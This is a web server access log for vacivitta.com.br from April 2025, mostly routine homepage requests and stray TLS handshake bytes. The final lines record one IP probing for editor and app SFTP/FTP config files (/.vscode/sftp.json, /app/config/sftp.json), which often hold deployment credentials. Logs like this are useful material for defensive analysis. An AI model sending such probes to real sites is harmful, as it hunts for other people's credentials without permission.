154.81.156.54 - - [16/Apr/2025:02:11:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
181.57.39.159 - - [16/Apr/2025:02:16:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
180.149.126.6 - - [16/Apr/2025:02:21:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:02:22:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [16/Apr/2025:02:24:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [16/Apr/2025:02:27:00 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
93.174.93.12 - - [16/Apr/2025:02:34:31 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-T537A Build/KOT49H) AppleWebKit/537.36 (KHTML like Gecko) Chrome/35.0.1916.141 Safari/537.36"
vacivitta.com.br:80
154.81.156.35 - - [16/Apr/2025:02:41:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:02:49:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:03:09:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
184.105.139.70 - - [16/Apr/2025:03:29:14 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:03:34:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
178.175.134.70 - - [16/Apr/2025:03:45:33 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:03:52:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [16/Apr/2025:03:54:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [16/Apr/2025:03:59:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
167.71.240.43 - - [16/Apr/2025:04:01:08 -0300] "GET /.vscode/sftp.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
167.71.240.43 - - [16/Apr/2025:04:01:08 -0300] "GET /.vscode/ftp-sync.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
167.71.240.43 - - [16/Apr/2025:04:01:08 -0300] "GET /app/config/sftp.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
